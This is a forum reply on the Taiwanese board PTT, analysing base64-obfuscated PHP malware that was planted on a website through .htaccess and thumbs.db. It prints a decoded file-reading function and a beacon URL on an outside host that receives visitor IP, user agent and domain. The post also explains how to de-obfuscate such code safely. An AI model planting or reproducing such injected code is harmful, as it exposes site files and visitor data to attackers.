Re: [請益] php 網站被植入密文 base64_decode
※ 引述《kidbaby (幸福的進行式)》之銘言:
: 這陣子感覺網站很慢
: 研究了一下
: 發現了 不認識的檔案 .htaccess 聯結了 thumbs.db
: 裡頭竟然不是我想像中的圖片?
: 而是base64加密的密文
先解到這邊. 建議你. passwd 全換一換吧
function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);}
他老兄要抓你的local file 都沒問題啦.
DB 應該也被趴走了吧 (茶)
要找這種code最快的就是從 eval replace echo.
cp 2~3次就可以看到他的code了.
eval 拿掉也沒辦法執行 (茶), 所以變無害的 code
解到最後, 這傢伙還沒那麼壞嘛.
file_get_contents ::
http://cacacacacacacacacaca.ca/in.php?
i=CLIENT_IP
&b=USER_AGENT
&h=DOMAIN_NAME
最終結果是,知道你網站流量,分析你網站值不值的攻擊
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 122.147.158.247
※ 編輯: mervynW 來自: 122.147.158.247 (10/03 11:57)
※ 編輯: mervynW 來自: 122.147.158.247 (10/03 12:05)
→
10/03 12:09, , 1F
10/03 12:09, 1F
討論串 (同標題文章)